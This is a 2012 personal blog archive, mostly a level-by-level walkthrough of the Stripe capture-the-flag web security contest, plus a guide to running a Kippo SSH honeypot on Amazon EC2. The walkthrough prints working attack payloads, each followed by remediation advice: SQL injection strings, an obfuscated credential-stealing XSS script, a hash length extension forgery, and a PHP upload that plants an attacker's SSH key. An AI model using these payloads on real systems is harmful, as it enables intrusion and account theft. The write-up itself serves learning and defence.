Monday, October 22, 2012

Mozilla Intern Presentation

As my experience as an intern at Mozilla slowly comes to an end, I've had some time to reflect on the work I've done and the projects I've been a part of. Last week, I had the opportunity to give a presentation to the Mozilla community about my intern work. Here is a link to that presentation from Air Mozilla:

Sunday, October 21, 2012

Kippo Honeypot on Amazon EC2 Instance Free Tier

A project I've had in mind for a while is to use Amazon's cloud (specifically, an EC2 instance) to set up a honeypot. Luckily, Amazon offers a low-end, free tier of service for an EC2 instance, which is just what I need for this project. In this post I'm going to walk through exactly what I did to set up a medium-interaction honeypot known as "Kippo" on an Amazon EC2 instance completely for free (at least for one year). This isn't as straightforward as it sounds because the free tier only gives you one IP address, which means you can't run the honeypot SSH on one IP and the admin/management SSH on another. Don't worry though, we'll fix that.

Setting up an EC2 Instance

The first step to setting up the honeypot is to subscribe to Amazon's EC2 service. You'll need to go through the registration and enter a credit card, but they won't charge anything to it. You'll also need to enter a phone number to receive a code in order to verify your identity. I'm not going to walk through that process here, but you can sign up and read more here:

Once your account is created, open up the AWS Management Console. It should look like this:

Click on "EC2". Now, launch an instance by clicking "Launch Instance."
Choose the "Classic Wizard" and continue. Now, select the Ubuntu Server 12.04 64-bit image (note: instances included in the free tier are marked with a star).
Choose one instance, and an instance type of "Micro" with 613MB memory (note: this is also marked with a star).
Click "continue" through instance details, nothing needs to be changed. Next, create a key pair and save the resulting .pem file. You will need this to SSH to the server. For a security group, select the quick-start group from the left.
Now, you can review your instance and create it. The instance may take some time to initialize. Once it finishes, you should see it running under "instances."

Getting an IP Address

Now, create a new elastic IP for your machine. This will allow your machine to retain a single IP through which attackers can SSH. Click on "elastic IPs" under "Network and Security." Then, allocate a new IP address. In many cases, honeypots will have two network interfaces - one for the attack surface, another for management. Each interface would have a different IP address to separate the attack surface from the management. However, Amazon's free tier allocates only a single elastic IP. Do not create a second IP or you may be charged for additional usage.

Once you have an IP, make sure it is pointing to your running instance.

SSH to the Instance

We can now connect to the instance via SSH. Make sure you are in the folder in which you saved your .pem file from Amazon. Then, ssh using the following command:

ssh -v -i <your-key>.pem ubuntu@ec2-<ip-address>

"ubuntu" is the default username for the instance.

Change the SSH Port

To get around the IP address restrictions, we're going to run the management SSH on a non-standard port and the honeypot on the typical port 22. This will allow us to both obscure the management connection and increase the number of attacks seen by the honeypot (almost every attacker will try port 22 for SSH first). To change ports, we need to edit the configuration file for the already-running SSH server and then restart the service. Do this carefully or you may lose access to your machine.

Begin by editing your SSH config file located here: /etc/ssh/sshd_config

At the very top of the file are the following lines:

# What ports, IPs and protocols we listen for
Port 22

Change this port number to something between 49152 and 65535. Make sure you write down the port number you selected; if you forget it, you will lose SSH access to the instance.
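With the example port used later in this post, the edited lines would read:

```
# What ports, IPs and protocols we listen for
Port 50683
```

Any unused port in that range works; just be consistent everywhere the port appears below.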

Now, restart the SSH service by running:

sudo /etc/init.d/ssh restart

When you run this command you will likely be disconnected from your machine. Hopefully you "restarted" and didn't "stop."

You will now need to edit the Amazon security rules within your AWS console to allow your new port on inbound connections. To do this, click "Security Groups" under "Network & Security." Then, click on the "quick-start-1" group and then the "Inbound" tab. Add your new port number and be sure to apply the changes.
You can see that my port is 50683 in this case.

Now, reconnect to the machine by running the following command. Note the added -p parameter to specify the port number.

ssh -v -i <your-key>.pem ubuntu@ec2-<ip-address> -p <port>

*Note: you can create an SSH configuration file so you don't need to specify all these options for every connection, but that is beyond the scope of this guide.

Hopefully you have reconnected to your machine. SSH is now running on a port other than 22 which will allow us to use the standard SSH port for our honeypot.

Installing Kippo

We can now install Kippo and begin configuring our honeypot. I am not going to re-write a guide for the installation process as it is well-documented and many guides already exist. This is a great guide, written for CentOS, but the process is very similar:

*Note that you should not need to update Python. Also, when downloading the Kippo source, be sure to use the latest version, as the guide is a bit old. Finally, you will need to add an iptables rule to redirect traffic from port 22 to port 2222, where Kippo listens by default (it should not run as root, so it cannot bind to port 22 itself). A typical rule looks like: sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

Once everything is installed and running, you should be able to issue the command:

ssh root@<your-ip>

and be logged into your honeypot.

Viewing Logs

One of the best parts of Kippo is that it logs every interaction an attacker has with the system. These logs are saved in /home/kipuser/kippo/log/
*kipuser may be replaced with the username of the kippo user you created.

To replay the logs, copy the script "" from kippo/utils into the kippo/log/tty folder, then issue the command:

sudo python <log-name>.log 0

This will replay the attacker's interaction with the system.

Further Resources

Wednesday, August 29, 2012

Stripe Capture the Flag - Level by Level Walkthrough

Last week, Stripe, a web payments company, launched an online web-security capture the flag event, which ended today (Wednesday) at noon. The event was designed to challenge participants on some very common, as well as lesser-known, vulnerabilities that exist in web applications. I decided to try my hand at the challenges and was fortunate enough to make it through all eight levels and earn myself an awesome prize (a Stripe T-shirt)! I spent a bit of time after each level collecting notes about what I had tried, what worked, what didn't, and why the vulnerability existed. Some of the challenges really required out-of-the-box thinking, but capturing the password, and eventually the flag, was a truly rewarding experience.

I have decided to make this blog post detailing each level now that the contest has ended. Stripe is releasing the CTF as a download for other organizers to run or to run locally, so if you haven't participated yet and may wish to in the future, I'd stop reading here because there are some very big spoilers ahead.

I am going to break down each level into: a description and background explanation (so even if you didn't participate in the challenge, you can still get an understanding of what is happening), what the vulnerability was, and remediation methods.

Note: All of my code solutions are also posted to my GitHub account. They are posted as-is and are not guaranteed to work without modification for your account/instances.

Level 0 - The Secret Safe
The first level starts us off with a simple application. The Secret Safe is a form, written in JavaScript with the Mustache JS framework and a SQLite backend, that allows users to enter a namespace, a secret name, and a secret, then save it in the database. The secrets can then be viewed by entering the namespace in a search field. We are told that the password to level one is stored in the database as one of the secrets. However, we don't know the namespace used to save the secret, and thus cannot simply search for it. Trying out the application a few times shows us the functionality, which is relatively simple. Secrets can only be retrieved by entering the correct namespace in the "view secrets for" box. Or can they?

Luckily (for the attacker), the SQL statement used to retrieve the stored secrets never sanitizes the user's search term, so we can enter text that changes the meaning of the query. Here is the exact SQL statement that is used when the user searches for a secret:

SELECT * FROM secrets WHERE key LIKE ? || ".%"

The || operator concatenates the user-supplied term with the literal ".%" to form the LIKE pattern. For example, if we were to enter the term "test," the final statement would effectively be:

SELECT * FROM secrets WHERE key LIKE "test.%"

The term is bound as a parameter, but the application never escapes LIKE metacharacters in the user's input, and that is the basis for our exploit. In SQL, the % character is a wildcard that matches any sequence of characters. Let's look at the effective statement when % is entered:

SELECT * FROM secrets WHERE key LIKE "%.%"

This statement returns every row, because the pattern "%.%" matches every namespaced key in the database. Entering a % gives us the following result (and the needed password):

The fundamental problem with this web application (and the cause of most web application vulnerabilities) is that it fails to treat user-entered input as unsafe. Information provided by the user in any shape or form should never be trusted by the application without first checking it. Each language has its own methods for escaping user data before building a SQL query, so the appropriate method for the language in use should be applied. Even safer queries can be generated by considering the kind of input expected; for example, an input asking for a user's name should never allow characters such as @, &, (, <, or >.
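A minimal sketch of the lookup in Python (the table layout follows the post; the stored key and secret are invented for illustration) shows why the wildcard leaks everything:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE secrets (key TEXT, secret TEXT)")
conn.execute("INSERT INTO secrets VALUES ('somenamespace.level1', 'the-password')")

def view_secrets(term):
    # The term is bound safely, but LIKE metacharacters in it are
    # never escaped, so "%" acts as a wildcard.
    return conn.execute(
        'SELECT * FROM secrets WHERE key LIKE ? || ".%"', (term,)
    ).fetchall()

print(view_secrets("test"))  # [] -- wrong namespace, nothing returned
print(view_secrets("%"))     # the pattern "%.%" matches every key
```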

Level 1 - Guessing Game

Level one implements a simple guessing game. In order to determine the password to the next level, a secret combination must be provided. The level uses PHP to load a file on the server, read its contents, and compare it to the parameter provided via GET (passed in via a form). If the parameter matches the combination, then the password is released.

One technique developers use in PHP applications is to assign parameters using the extract() function. Given a query string such as:

?attempt=test

extract($_GET) assigns the variable $attempt the value "test." This works well when there are many variables to be retrieved (such as when submitting a large form) because it removes the need to assign each variable individually:

$attempt = $_GET['attempt'];
$var2 = $_GET['next_var'];

However, extract() introduces a security risk because it allows variables that have been previously set to be overridden by user input. In the application code, the variable $filename is set before extract() is used. If we provide our own filename parameter, we can overwrite the original:

?attempt=&filename=

In this case, we are setting both the attempt and the filename variables to the empty string "". Following the logic of the code, this causes the combination variable to also be set to "" since the filename is blank. Finally, this causes the if statement:

if($attempt === $combination)

to evaluate to true, releasing our password.
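The flow can be sketched as a loose Python analogue (check_guess and the filename are made up; PHP's extract() is mimicked with a dict update, and file_get_contents() failing on a missing file is approximated by catching the error):

```python
def check_guess(params):
    # Trusted variable set first, like $filename in the PHP code
    scope = {"filename": "secret-combination.txt"}
    scope.update(params)  # like extract($_GET): request keys override
    try:
        combination = open(scope["filename"]).read()
    except OSError:
        combination = ""  # an unreadable file collapses to the empty string
    return params.get("attempt", "") == combination  # strict comparison

# Overriding filename with "" makes combination "", which matches our
# empty attempt, so the check passes without knowing the combination.
print(check_guess({"attempt": "", "filename": ""}))  # True
```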

Although the extract() function is dangerous in its native form, it can be made safer by passing the EXTR_SKIP option, which prevents already defined variables (such as $filename in the above example) from being overwritten by $_GET or $_POST values. Alternatively, the EXTR_PREFIX_SAME option adds a prefix to the name of any incoming variable that would collide with an existing one.

Level 2 - Social Network

The social network is a basic application that allows for images to be uploaded as a profile picture. There is little more functionality beyond that, but that is all that is needed to exploit this level.

The vulnerability in level two is so severe that it is used in the attacks of future levels. The developers of the application allow users to upload files but do not restrict the uploads in any way. Although the upload page asks the user to upload an image, we can upload any file we like. Since the page is written in PHP, we can safely assume a PHP server is running and upload our own PHP files for execution. Analyzing the code shows us that the password is stored in a file called "password.txt." Using the file_get_contents() function of PHP, we can create a very simple page which will retrieve our password:

<?php echo file_get_contents("../password.txt"); ?>

Note that we need to use ../ to go up to the user directory from the uploads directory where our page is saved. Running the page from the uploads directory gives us the password needed for level three.

The main vulnerability here is that the upload page accepts files of any type. PHP allows upload restrictions based on the MIME type (e.g. image/png, image/jpeg). A file's extension should never be the sole check, because anyone can change a file's extension, though it can be compared against the MIME type for a bit of added security. Since the MIME type can be spoofed, and arbitrary code can be embedded inside an image file, the best option is to combine checks: verify the MIME type on upload and assign the stored file's extension yourself based on that type.

Level 3 - Secret Vault

Level three appears to be a simple login-based application. In order to determine the password, we need to login using a valid username and password. This application is written in Python (more specifically, the Flask framework) with a SQLite backend.

As with level zero, the input from the user is not properly escaped before being compiled as part of the SQL query. This allows us to inject malicious SQL to return the user "bob" who holds the password to level four. Below is the exact query that is vulnerable:

query = """SELECT id, password_hash, salt FROM users WHERE username = '{0}' LIMIT 1""".format(username)

The query is executed using cursor.execute(query) in Python. The execute function prevents us from simply ending the first query with a semicolon and beginning a new query such as:

bob; UPDATE users SET salt='' WHERE username='bob'

or something similar to directly modify the data in the database. However, we can use the UNION keyword to extend the original query and return the information we want. In SQL, UNION merges the results of the left hand query with that of the right. By entering the following query as the username, we can set the values of password_hash and salt to ones we know:

bob' UNION SELECT 1 as id, 'd74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1' as password_hash, '' as salt FROM users WHERE'1'='1

To determine the value of the password_hash, we need to determine what function the application is using to calculate it. Looking at the code reveals that it is sha256. An online hash calculator allows us to determine a hash for a password we know, such as "pass" in the example above.

By setting the salt to the empty string '', we cause only the password we entered in the password box, "pass," to be hashed. When it is, it matches the hash we provided, giving us access to the user account. The final statement, with the injection, looks like:

SELECT id, password_hash, salt FROM users WHERE username = 'bob' UNION SELECT 1 as id, 'd74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1' as password_hash, '' as salt FROM users WHERE'1'='1'
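The injection can be reproduced against a throwaway SQLite database (the schema and bob's stored row are invented for this sketch; LIMIT 1 is dropped so both rows are visible, and the salt is assumed to be concatenated with the typed password before hashing, which with an empty salt makes no difference):

```python
import hashlib
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT, salt TEXT)"
)
# bob's real row -- the hash and salt are unknown to the attacker
conn.execute("INSERT INTO users VALUES (1, 'bob', 'real-hash-we-cannot-guess', 'real-salt')")

payload = ("bob' UNION SELECT 1 as id, '"
           + hashlib.sha256(b"pass").hexdigest()
           + "' as password_hash, '' as salt FROM users WHERE'1'='1")

# Vulnerable pattern from the post: the username is formatted straight in
query = "SELECT id, password_hash, salt FROM users WHERE username = '{0}'".format(payload)

for row in conn.execute(query):
    print(row)  # the forged row carries a hash/salt pair we control

# With the salt injected as '', only the typed password "pass" is hashed,
# and that matches the forged password_hash exactly.
assert hashlib.sha256(("" + "pass").encode()).hexdigest() == hashlib.sha256(b"pass").hexdigest()
```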

As with level zero, user input should never be trusted. In this case, the first single quote after "bob" allows us to break out of the original statement. By properly escaping the input, this injection could be prevented.

Level 4 - Karma Fountain

The concept of Karma Fountain is that users send other users "karma." However, to prevent abuse, the application also sends the password of the sending user to the recipient. A "super user" known as Karma Fountain has unlimited Karma to share. If Karma Fountain were to send Karma to someone, its password would also be exposed. The application prevents users from logging in as Karma Fountain. Finally, we are told that Karma Fountain logs into its account every few minutes.

To find the vulnerability, we first need to determine what we can attack. Looking at the code, one user-input field that is displayed back to other users is never escaped: the password field. The following code shows that the username is checked to ensure it contains only word characters, but no such protection is in place for the password:

     unless username =~ /^\w+$/
          die("Invalid username. Usernames must match /^\w+$/", :register)
     end

Now that we have determined that the password field is not escaped, we need to determine an attack type. Since the password field is shown to all users who have received Karma from us, we can launch a cross-site scripting attack against Karma Fountain by sending it karma from an account with a password containing XSS.

To execute an XSS, we need to determine what is happening when we send karma. By using any intercepting proxy (such as BurpSuite or Zed Attack Proxy) or even using the web developer tools in the Firefox or Chrome browsers, we can see the exact request made to send karma.

As this shows, a POST is made to transfer/ with the parameters "amount" and "to." We now know that we need to craft an XSS payload that makes a POST request to transfer/ with "amount" set to any amount and "to" set to our username. Below is the XSS I used to do just that:

<script>var xmlhttp=new XMLHttpRequest();"POST","transfer",true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.send("to=one&amount=25");</script>

By setting this string as the password of my account, I could then login, send Karma Fountain some karma, and wait until it logged in, executed my script, and posted karma to my account, exposing its password. The above XSS payload could also be written in JQuery using $.post if the site is using JQuery.

As with SQL injection, XSS is made possible by the direct use of user input as part of a page. In this case, the password field is the only input that is not checked. XSS is prevented by properly encoding the output from stored user input before it is executed as part of the page itself. Every language and framework has varying methods for preventing XSS (such as htmlentities and htmlspecialchars in PHP). You can read more about preventing XSS at this OWASP page.

Level 5 - Domain Authenticator

The Domain Authenticator is an application that allows users to provide a "pingback URL," a username, and a password to log in. The pingback is essentially a website that validates the credentials and responds with AUTHENTICATED or DENIED. The response also includes the host, so the domain that serves the pingback determines which level's user you authenticate as. The goal is to authenticate as a level five user. However, the level five machines only have network connectivity to other stripe-ctf servers.

The vulnerability in this level lies in a programming error that allows pingbacks to be chained recursively, combined with how the host is checked. The level five server accepts a /?pingback parameter, so the pingback target can be set directly in the query string.

Knowing this, we can exploit the file upload vulnerability from level two to host a file that always returns AUTHENTICATED. I uploaded the following file, named pingback.php, to level two:

<?php echo "AUTHENTICATED"; ?>
However, supplying just that URL as the pingback will only authenticate us as a member of a level two machine, since the host serving the response is a level two server. We want the response to come from a level five server. To do this, we can chain the pingback recursively: point the level five server's pingback parameter at the level five server itself, with our uploaded file as the innermost pingback.

Entering this chained URL in the pingback field causes the response to appear to come from a level five machine, allowing us to gain access.

This vulnerability is introduced by a logic error: the developers did not consider that a user would recursively chain pingback URLs. It just goes to show that user input should always be treated as untrusted, and that you should expect the unexpected. The security of this application could be improved by carefully restricting which pingback targets are accepted.

Level 6 - Streamer

Streamer is a miniature Twitter-style application. Users post an update and all other users see it. There is one user, level07-password-holder, who checks in periodically (every three to four minutes) to see the latest updates. After creating an account, anyone can post updates, which are seen by all other users. By visiting the URL ajax/posts, a JSON string of all previous posts can be viewed. When posting an update, a POST is made to that same URL with a post title, body, and CSRF token. The post body cannot contain quotes, or it is rejected. Finally, to remind users of their passwords, the application stores user credentials on a page called "user_info," which is available upon logging in. We are told that level07-password-holder's password is complex and contains both single and double quotes, which is important.

The vulnerability in Streamer is similar to the one in Karma Fountain (cross-site scripting). However, this level challenges the user to carefully craft an XSS attack that will obtain the required pieces of information and make the correct POST. Knowing that the level07-password-holder logs in every few minutes gives us an opportunity to create a payload. First, we have to find how the data is being retrieved and presented.

Streamer renders the posts/ page from a JSON string of posts, and new posts are saved by POSTing to that same endpoint. To exploit the XSS, we need to break out of the returned JSON string and execute arbitrary code on the page without using quotes. A simple script allows us to do that:

}];</script><script>alert(1)</script>//
Entering this code as the body of a post and then refreshing the page causes the alert to appear. We now have the format for our XSS.

By looking at the source of the page, we can tell that JQuery is being used. This will make our attack much easier by giving us functions to work with and reducing the amount of code needed. It is also evident that a CSRF token is in use. Cross-Site Request Forgery is an attack that lets an attacker submit a POST to a page from any other webpage, not just the page with the form; this application is not vulnerable to CSRF thanks to the token. The token, however, is a required part of the POST request, so our XSS must obtain it before making its POST.

Note: there are a number of ways this level can be solved using XSS. I used JavaScript to find the CSRF token, made a GET request to the user_info page to obtain the user's credentials, and POSTed the results to the ajax/posts page. However, it is also possible to obtain the credentials, set the value of the post textbox to match them, and submit the form, all using JQuery. In some cases, it is also possible to simply steal the user's session cookies, but this application used httponly cookies, which prevent scripts from accessing them.

The methodology for this attack is to make a GET request to the user's user_info page (which contains his credentials), save the response, then POST the response to the ajax/posts page. Below is an XSS payload I used to do just that. Note that I used a replace function to remove the quotes before POSTing to prevent the password from escaping out of the JSON.

$.get("user_info", function(result){
        var data = $(result).find('td').text();
        var csrf_token = document.forms[0].elements["_csrf"].value;
        var replaced = data.replace(/"/g, "YY");
        replaced = replaced.replace(/'/g, "XX");
        $.post("ajax/posts", { title: "THIS", body: replaced, _csrf: csrf_token } );
});

This payload now needs to be converted to character codes to avoid the use of quotes. Using an online converter such as this one, our attack now looks like:

}];</script><script>eval(String.fromCharCode(36, 46, 103, 101, 116, 40, 34, 117, 115, 101, 114, 95, 105, 110, 102, 111, 34, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 114, 101, 115, 117, 108, 116, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 100, 97, 116, 97, 32, 61, 32, 36, 40, 114, 101, 115, 117, 108, 116, 41, 46, 102, 105, 110, 100, 40, 39, 116, 100, 39, 41, 46, 116, 101, 120, 116, 40, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 99, 115, 114, 102, 95, 116, 111, 107, 101, 110, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 102, 111, 114, 109, 115, 91, 48, 93, 46, 101, 108, 101, 109, 101, 110, 116, 115, 91, 34, 95, 99, 115, 114, 102, 34, 93, 46, 118, 97, 108, 117, 101, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 114, 101, 112, 108, 97, 99, 101, 100, 32, 61, 32, 100, 97, 116, 97, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 34, 47, 103, 44, 32, 34, 89, 89, 34, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 114, 101, 112, 108, 97, 99, 101, 100, 32, 61, 32, 100, 97, 116, 97, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 39, 47, 103, 44, 32, 34, 88, 88, 34, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 47, 47, 114, 101, 112, 108, 97, 99, 101, 100, 32, 61, 32, 100, 97, 116, 97, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 92, 34, 47, 103, 44, 32, 34, 88, 88, 34, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 36, 46, 112, 111, 115, 116, 40, 34, 97, 106, 97, 120, 47, 112, 111, 115, 116, 115, 34, 44, 32, 123, 32, 116, 105, 116, 108, 101, 58, 32, 34, 84, 72, 73, 83, 34, 44, 32, 98, 111, 100, 121, 58, 32, 114, 101, 112, 108, 97, 99, 101, 100, 44, 32, 95, 99, 115, 114, 102, 58, 32, 99, 115, 114, 102, 95, 116, 111, 107, 101, 110, 32, 125, 32, 41, 59, 10, 32, 32, 32, 32, 125, 41, 59))</script>//
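The conversion itself is easy to script. Here is a sketch in Python (encode_payload is my own helper, not the converter used in the original post; the wrapper string matches the payload format above):

```python
def encode_payload(js):
    # Represent every character of the JavaScript as a decimal char
    # code so the final post body contains no quote characters at all.
    codes = ", ".join(str(ord(c)) for c in js)
    return ("}];</script><script>eval(String.fromCharCode("
            + codes + "))</script>//")

print(encode_payload("alert(1)"))
```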

Once the attack is crafted, we can post it as an update, wait for the level07-password-holder to log in, then visit ajax/posts where we should see the password.

Again, this attack relies on the application to treat user data as untrusted. By properly escaping all data that users input, this attack can be avoided.

Level 7 - WaffleCopter

WaffleCopter is a food delivery service with a set of user "levels." The earlier users (determined by user_id) are "premium" users and can order premium waffles. You, however, are not, and therefore cannot order premium waffles. The goal of the challenge is to order a premium waffle without being a premium user.

Upon logging in, you are given an API endpoint, a user_id, and a secret. Using this information, you can POST to the endpoint using your secret and user_id to order a waffle. The application checks that you are a premium user before allowing a premium order.

The application also allows you to view logs of previous API requests. By viewing the following URL, you can see all of your requests: https://<level7_server>/logs/<your_user_id>. Replacing your user_id with "1" (a premium user) gives the following results:

2012-08-23 08:04:55 /orders count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo|sig:75c0741cc140d77f70bca0cb473788249f1fd0fe

2012-08-23 08:04:55 /orders count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken|sig:bbab520cfdd9b8b91df1e613b0525d252b7c777b

This page shows that a signature is appended to the request. To calculate the signature, an algorithm called SHA1 is used, as in the following code:

def _signature(self, message):
     h = hashlib.sha1()
     h.update(self.api_secret + message)
     return h.hexdigest()

The vulnerability in this application comes from the way SHA1 is used to calculate the signature: hashing the secret followed by the message (a secret-prefix construction) is vulnerable to an attack known as hash length extension. I am not going to delve into the cryptography involved, but here is a simple explanation from WhiteHat Security:

If you have a message that is concatenated with a secret and the resulting hash of the concatenated value (the MAC) – and you know only the length of that secret – you can add your own data to the message and calculate a value that will pass the MAC check without knowing the secret itself.

Ultimately, because of the way SHA1 is designed, we can append arbitrary data to the end of a request after a block of padding and calculate a valid signature for the result. Since we know the signature of a user_id 1 request from the API logs, as well as the length of the key, we can calculate a new extended, padded message and a new signature that will pass the check.

To do this, I used a hash length extension tool, which takes the following parameters: <keylen> <original_message> <original_signature> <text_to_append>

We have the key length (14). The original message is a request from the API such as: "count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken". We also have the original signature (in my case: bbab520cfdd9b8b91df1e613b0525d252b7c777b). The text we want to append is this: "&waffle=liege". This will override the first variable "waffle" and replace "chicken" with "liege," the name of a premium waffle.

Running our tool gives us the following output:

new msg: 'count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x028&waffle=liege'
new sig: 15fa901713b0252d03b30f206ad58aee06e6d846
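The "new msg" above is just the original message plus standard SHA-1 glue padding. The padding step can be sketched as follows (extend_message is a hypothetical helper; forging the signature itself additionally requires resuming SHA-1 from the leaked digest's internal state, which is what the tool does):

```python
import struct

def extend_message(key_len, original, suffix):
    # SHA-1 pads with 0x80, zero bytes until the length is 56 mod 64,
    # then the total message length in bits as a big-endian 64-bit int.
    glue_len = key_len + len(original)
    padding = b"\x80" + b"\x00" * ((55 - glue_len) % 64)
    padding += struct.pack(">Q", glue_len * 8)
    return original + padding + suffix

msg = extend_message(
    14,  # known secret length
    b"count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken",
    b"&waffle=liege",
)
print(repr(msg))  # same shape as the "new msg" output above
```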

We can now make a POST request to our end point using our new message and the new signature.

This vulnerability is introduced by using a bare hash of the secret and message as a signature. The proper construction for this purpose is an HMAC (e.g. HMAC-SHA1), which is not vulnerable to length extension. It would also help if each user's API logs were visible only to that user (this would prevent us from obtaining the needed signature).

Level 8 - Chunk Servers

The last level of the CTF is rightfully the most challenging. It requires thinking outside the box, and it is quite difficult to spot the vulnerability at first. This level involves a password-storing mechanism that saves passwords in chunks. For example, a 12-digit password is stored as four chunks of three digits each. These chunks are distributed across "chunk servers," which can live on different ports of the same physical server or on separate remote servers. The main server receives a password-check request, splits the candidate password into chunks, then polls each chunk server for its piece; a chunk server returns true if its chunk is correct. This continues until either a chunk server returns false, in which case the main server reports the password as incorrect, or all chunk servers return true, in which case the main server returns true.

When a POST is made, there is an option for "webhooks." A webhook will be sent a copy of the response, such as "success:true" or "success:false". One additional fact makes this level a bit more difficult: the level eight servers only have network access to other stripe-ctf servers.

As with each of the levels, Stripe provided the source code for download. In the case of level eight, downloading and running the source code locally is extremely beneficial to understanding where the vulnerability may exist.

Finding the vulnerability really requires thinking about all of the information that a server returns with its response, down to the socket level. Using the following code snippet, we can make a sample request to the server and print out the information associated with the response.

data = json.dumps({"password": key, "webhooks": [""]})
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
output = response.read()

# s is a listening socket acting as our webhook endpoint
client, address = s.accept()
data_recv = client.recv(size)
if data_recv:
    print data_recv, address  # address is a (host, port) tuple

Note that I have left out some import statements and other code for the sake of brevity.

When this code is executed, the response is printed, including the response data as well as the address and source port of the connecting server. This information is crucial to discovering the vulnerability.

To find what is happening, we can make requests on our local server using a known correct and a known incorrect password. For example, if we start the server using password "123456789012", we can try requests with passwords "123456789012" (a correct one), "023456789012" (first chunk incorrect), "123056789012" (second chunk incorrect), etc.

By analyzing the responses, a pattern emerges. When the error is in the first chunk, the port number seen between two successive requests increments by two (the exact increment may differ for each application instance). When the error is in the second chunk, the increment is three, and so on. This pattern allows us to develop a script that can brute force the chunks individually rather than the entire password at once (the difference between a few thousand requests and 999 billion).
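To see why this works, here is a toy simulation (entirely my own model, not the real servers): every outbound connection the main server makes consumes one ephemeral port, and the brute-forcer watches the port delta between successive webhook callbacks to tell how deep its guess got:

```python
class FakeMainServer:
    """Toy model: each outbound connection (chunk-server requests plus the
    webhook callback) consumes one ephemeral port, visible to the webhook."""
    def __init__(self, password, chunk_size=3):
        self.chunk_size = chunk_size
        self.chunks = [password[i:i + chunk_size]
                       for i in range(0, len(password), chunk_size)]
        self.port = 50000  # arbitrary starting ephemeral port

    def check(self, attempt):
        guesses = [attempt[i:i + self.chunk_size]
                   for i in range(0, len(attempt), self.chunk_size)]
        ok = True
        for guess, real in zip(guesses, self.chunks):
            self.port += 1          # one connection to a chunk server
            if guess != real:
                ok = False          # early exit: later chunks never checked
                break
        self.port += 1              # the webhook callback connection
        return ok, self.port        # the webhook sees this source port

def crack(server, length=12):
    """Recover the password chunk by chunk by watching port deltas."""
    known = ""
    while len(known) < length:
        wrong_delta = len(known) // server.chunk_size + 2
        prev_port = server.port
        for i in range(1000):
            guess = "%03d" % i
            attempt = (known + guess).ljust(length, "0")
            ok, port = server.check(attempt)
            if ok:
                return attempt                 # guessed the final chunk
            if port - prev_port != wrong_delta:
                known += guess                 # server went one chunk deeper
                break
            prev_port = port
    return known
```

In the simulation no error correction is needed; on the live server, other players' traffic perturbs the deltas, which is why the rechecks described below were necessary.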

Now, we need to run our script on a level two machine so that the webhook can be contacted (remember: level eight servers only have access to other stripe-ctf servers). Luckily, the level two server is running an SSH server as well, allowing us to connect. We just need to upload our public key to the ~/.ssh/authorized_keys file.

To do this, I created a simple PHP page, uploaded it to level two, and ran it. The same result could be accomplished with a PHP shell, allowing us to enter commands directly.

<?php file_put_contents('.ssh/authorized_keys', "my_public_key_here\n"); ?>

Now, we can SSH into the level two server.

We can then cd to the uploads folder where we can run any scripts that are uploaded via the web interface (I never did get scp working).

Back to the script: there are a number of ways it could be written. Personally, I wrote a script that checked each chunk individually, starting with the first. It would try "000", "001", "002", and so on. On each request, it would analyze the port in the response. If the port changed by the expected increment (2 for the first chunk, 3 for the second, 4 for the third, and 5 for the fourth), it continued to the next guess. However, if the change was more than the expected increment, it would pause and send two new requests with the same chunk (for example, "001" and "001" again), then analyze the ports again. If the increment was still not the expected one, it would repeat the process two more times. If the ports incremented by more than the expected amount three times in a row, the script stopped and marked the chunk as the correct one.

The rechecks are done for error correction. Because many other users were testing on the same level eight server, their requests could consume ports in between mine, so the expected increment did not always appear even for an incorrect chunk. However, it was rare for that to happen three or more times in a row.

Once the chunk was found, I edited the script to test the next chunk. The overall process took about an hour; the script could be much improved by using multiple threads. I am uploading my scripts to GitHub, but they require edits before being usable on systems and user accounts different from mine.

Eventually, after the third chunk was found, I switched to polling the main server with full password guesses: xxxxxxxxx000, xxxxxxxxx001, etc. When it returned true, I had found the flag!

The vulnerability in this application is another programming logic error: the source port visible to the webhook leaks how many chunk servers the main server contacted, and therefore how far into the password a guess was correct. This again shows that attackers will use any information they can get to exploit an application.


The Stripe CTF was a truly awesome experience. The challenges were crafted uniquely and with great precision. I admit that a number of these levels truly stumped me at first. But in a larger sense, they forced me to think in ways I hadn't previously thought. I hope this walkthrough has been beneficial and that this entire contest raises more awareness about web security as a whole.


During the CTF I was Googling like crazy. Here are just a few of the resources I used while working on the CTF and in writing this post.

Monday, August 6, 2012

Random Project - PasteBin Searcher

I have recently begun learning Python and, like anything I've tried to learn, needed a project in order to help me get started. So, for something simple, I decided to create a tool that periodically searches the website PasteBin for a user-provided term.

